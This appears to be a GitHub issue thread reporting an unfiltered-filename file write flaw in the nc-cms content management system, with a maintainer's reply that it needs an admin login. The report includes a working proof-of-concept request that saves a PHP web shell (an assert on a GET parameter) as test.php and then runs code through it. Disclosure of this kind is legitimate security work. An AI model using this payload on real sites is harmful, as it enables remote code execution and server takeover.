Hello, I found that this cms may have some security problem(use default file storage)
Source:
./nc-cms/system/lib/storage/Filesystem.php:13-19
function ContentSave($name, $data)
{
$path = NC_BASEPATH.'/../content/'.$name;
$fh = fopen('content/'.$name, 'w') or die(NCUtility::Error("Could not open file: ".$name.". Make sure that this server has read and write permissions the /nc-cms/content folder."));
fwrite($fh, $data);
fclose($fh);
}
For people watching, this is only a vulnerability if the admin falls victim to some sort of XSS attack as it requires a login. I may patch at a future date regardless.
If I am seriously wrong about this in some way, please re-open an issue.
Hello, I found that this cms may have some security problem(use default file storage)
Source:
./nc-cms/system/lib/storage/Filesystem.php:13-19
./nc-cms/system/lib/NCCms.class.php:382-394
the file name directly controlled by the user without filtering
payload:
http://localhost/nc-cms-master/nc-cms/index.php?action=save&ref=123 [POST]name=test.php&editordata=<?php assert($_GET['t']);?>exploit:

http://localhost/nc-cms-master/nc-cms/content/test.php?t=phpinfo();
The text was updated successfully, but these errors were encountered: